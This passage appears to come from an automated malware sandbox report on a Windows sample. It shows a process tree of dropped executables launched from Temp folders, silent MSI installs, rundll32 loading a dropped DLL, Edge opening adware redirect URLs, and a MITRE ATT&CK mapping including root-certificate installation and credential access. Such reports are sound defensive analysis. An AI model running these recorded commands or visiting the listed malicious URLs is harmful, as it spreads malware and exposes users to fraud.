        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
        5⤵
        
        PID:1032
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
        5⤵
        
        PID:8144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
        5⤵
        
        PID:8644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=128 /prefetch:1
        5⤵
        
        PID:8892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
        5⤵
        
        PID:10100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
        5⤵
        
        PID:9332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
        5⤵
        
        PID:10092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
        5⤵
        
        PID:8296
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
        5⤵
        
        PID:10952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
        5⤵
        
        PID:11268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
      4⤵
      PID:1988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:6984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
      4⤵
      PID:1784
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:4404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
      4⤵
      PID:2560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:3204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
      4⤵
      PID:8560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:8584
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
      4⤵
      PID:10004
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:10024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
      4⤵
      PID:3480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:9392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
      4⤵
      PID:8412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x110,0x114,0x118,0xe0,0x11c,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        
        PID:3480
- - C:\Users\Admin\AppData\Local\Temp\84-2835c-b49-be1a1-02c192d0de993\Daecujyxopa.exe
    "C:\Users\Admin\AppData\Local\Temp\84-2835c-b49-be1a1-02c192d0de993\Daecujyxopa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:6036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4svfnmm.ea1\GcleanerEU.exe /eufive & exit
      4⤵
      PID:2764
    - - C:\Users\Admin\AppData\Local\Temp\m4svfnmm.ea1\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\m4svfnmm.ea1\GcleanerEU.exe /eufive
        5⤵
        Executes dropped EXE
        
        PID:4808
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 280
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjawnrqq.aki\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:1360
    - - C:\Users\Admin\AppData\Local\Temp\sjawnrqq.aki\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\sjawnrqq.aki\installer.exe /qn CAMPAIGN="654"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:4860
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sjawnrqq.aki\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sjawnrqq.aki\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630902390 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        6⤵
        Enumerates connected drives
        
        PID:3036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kn1q1vlg.oej\anyname.exe & exit
      4⤵
      PID:3080
    - - C:\Users\Admin\AppData\Local\Temp\kn1q1vlg.oej\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\kn1q1vlg.oej\anyname.exe
        5⤵
        Executes dropped EXE
        
        PID:3644
      - C:\Users\Admin\AppData\Local\Temp\kn1q1vlg.oej\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kn1q1vlg.oej\anyname.exe" -u
        6⤵
        Executes dropped EXE
        
        PID:6028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rhjs1cpn.2og\gcleaner.exe /mixfive & exit
      4⤵
      PID:5024
    - - C:\Users\Admin\AppData\Local\Temp\rhjs1cpn.2og\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\rhjs1cpn.2og\gcleaner.exe /mixfive
        5⤵
        
        PID:6052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 280
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:732
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qq0w35w.n3o\autosubplayer.exe /S & exit
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4332

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv dn8LwwbFRkCXo9mq/8woaw.0.2
1⤵
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5080 -ip 5080
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4856 -ip 4856
1⤵
PID:5532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4868 -ip 4868
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5568

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1792
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 460
    3⤵
    - Program crash
    PID:5468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5340 -ip 5340
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6072 -ip 6072
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 4600 -ip 4600
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1368 -ip 1368
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4584 -ip 4584
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4384

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Executes dropped EXE
PID:1368
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:4524
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 460
    3⤵
    - Executes dropped EXE
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4524 -ip 4524
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4808 -ip 4808
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1604

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4432
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 346894F827AFE43220BB54FBB7170E9B C
  2⤵
  - Loads dropped DLL
  PID:904
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 263A98A3537326981474C9201286CFC5
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:3716
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:4468
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 64D019C3CB5AE81F0947E1F93924EC62 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:4764

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 6052 -ip 6052
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5536

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4484
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:4080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 452
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4080 -ip 4080
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5368 -ip 5368
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:6840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:6200

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 476 -p 5624 -ip 5624
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5708 -ip 5708
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4132

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 5028 -ip 5028
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5888 -ip 5888
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1544 -ip 1544
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6720 -ip 6720
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5712 -ip 5712
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2624 -ip 2624
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7716 -ip 7716
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6292 -ip 6292
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6572 -ip 6572
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 8416 -ip 8416
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 9672 -ip 9672
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 9380 -ip 9380
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9752 -ip 9752
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 9328 -ip 9328
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4752 -ip 4752
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 10952 -ip 10952
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 11332 -ip 11332
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:11424

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery